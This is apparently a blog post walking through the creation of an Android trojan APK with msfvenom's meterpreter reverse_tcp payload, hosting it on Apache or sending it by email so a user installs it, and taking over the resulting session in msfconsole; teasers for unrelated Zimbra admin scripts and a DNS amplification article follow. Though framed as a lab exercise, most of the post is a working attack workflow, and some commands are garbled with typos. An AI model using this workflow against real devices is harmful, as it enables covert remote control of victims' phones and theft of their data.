Skip to main content

Demo for Mobile (Andriod) App Hacking using Kali Linux and Metasploit Framework


What is Kali Linux ? 

 Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.
What is Metasploit Framework ? 

 The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.

 Please follow the below for the Testing of Andriod Mobile  using Vulnerable Mobile App (Using Metasploit Framework)

1. Install the KALI LINUX in Virtual BOX/VMWARE

2. Install the Andriod OS in Virtual Box  from https://www.osboxes.org/android-x86/


Android-x86 4.4-r4 (download this Version)
3.Please follow the below for the Testing of Andriod using App (Using Metasploit Framework)


4. Create the MALWARE for Andriod


#msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.50.21-o /root/fun.apk


5. Share the app to user/Mobile Phone  using apache or Email.


#start apache2 start
#start postgresql start

Borwse the IP to verify the Web server is Running

Create the Folder in /var/www/html/fun/

Copy the file fun.apk to /var/www/html/fun/


6. In the Kali VM Start the postgresql by using 

# service postgresql start
#msfconsole
msf>set payload andriod/meterpreter/reverse_tcp
msf exploit(handle)>set LHOST 192.168.50.21(KALI VM IP ADDRESS)
msf .....>show options
msf......> exploit -j z

(We need to Wait for Andriod Device to install APK)

Browse the Website /fun/ & Install fun.apk
In andriod go to Download and install apk See the permission


Go to Kali Linux We will see the session is there

>sessions -i 1
>help
(It will show the commands)
>ifconfig
>ps
>ls



Comments

Post a Comment

Popular posts from this blog

Password Expiry notification for the users in zimbra 8.x within 7 Days for the email users

This Script will run as cron tab daily basis and it will alert the users for whom password is going to expire within 7 days. It will also alert admin for the users for whom password expired. Kindly replace the domain.com with your own domain name and the  /opt/zimbra/postfix-2.10.3.2z/sbin/sendmail  path to the actual path of postfix #!/bin/bash #Script for zimbra password expiry email notification. # Meant to be performed as daily cronjob run as zimbra user.  # redirect output to a file to get a 'log file' of sorts. # Time taken of script; echo "$SECONDS Started on: $(date)" # Set variables: # First notification in days, then last warning: FIRST="7" LAST="3" # pass expiry in days, we are assuming passwd exiry is 150 Days POLICY="150" # Sent from: FROM="admin@domain.com" # Get all users - it should run once only. USERS=$(ionice -c3 /opt/zimbra/bin/zmprov -l gaa domain.com) #Todays date, in seconds: DATE...
Post a Comment
Read more

How to Create a Delegated Admin Account in Zimbra 8.x

How to Create a Delegated Admin Account in Zimbra 8.x. Create a File as shown below with the contents .  Replace the domain.com and helpdesk Email id with your domain and helpdesk (Delegated Admin ) Name. #vi admindelegate #!/bin/bash # $1 domain.com # $2 helpdesk zmprov ma $2 zimbraIsDelegatedAdminAccount TRUE zmprov ma $2 zimbraAdminConsoleUIComponents cartBlancheUI zimbraAdminConsoleUIComponents domainListView zimbraAdminConsoleUIComponents accountListView zimbraAdminConsoleUIComponents DLListView zmprov ma $2 zimbraDomainAdminMaxMailQuota 0 zmprov grantRight domain $1 usr $2 +createAccount zmprov grantRight domain $1 usr $2 +createAlias zmprov grantRight domain $1 usr $2 +createCalendarResource zmprov grantRight domain $1 usr $2 +createDistributionList zmprov grantRight domain $1 usr $2 +deleteAlias zmprov grantRight domain $1 usr $2 +listDomain zmprov grantRight domain $1 usr $2 +domainAdminRights zmprov grantRight domain $1 usr $2 +configureQuota zmpr...
Post a Comment
Read more

DNS AMPLIFICATION LIMITS AND SOLUTIONS - DNSCURVER ALTERNATE TO DNSSEC

What is   DNS Amplification Attack   ? Before we understand the DNS Amplification Attack, lets learn about DDoS first. Distributed denial-of-service Attack (DDoS), is a cyber threat looming large on Organizations. It adversely affects the online productivity of individuals too. Anyone who relies on their Internet presence to generate revenue can be a target. The Security tangent comes in question here. First, let us understand what DoS attack is. A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users. This is usually performed by interrupting or suspending the services of a host connected to the Internet. Distributed DoS (DDoS) attacks are DoS attacks launched from multiple hosts simultaneously. The flood of incoming messages to the target system forces it to shut down or choke bandwidth. Hence, denying service to the legitimate users. The domain name system (DNS) is one of the most critical ser...
Post a Comment
Read more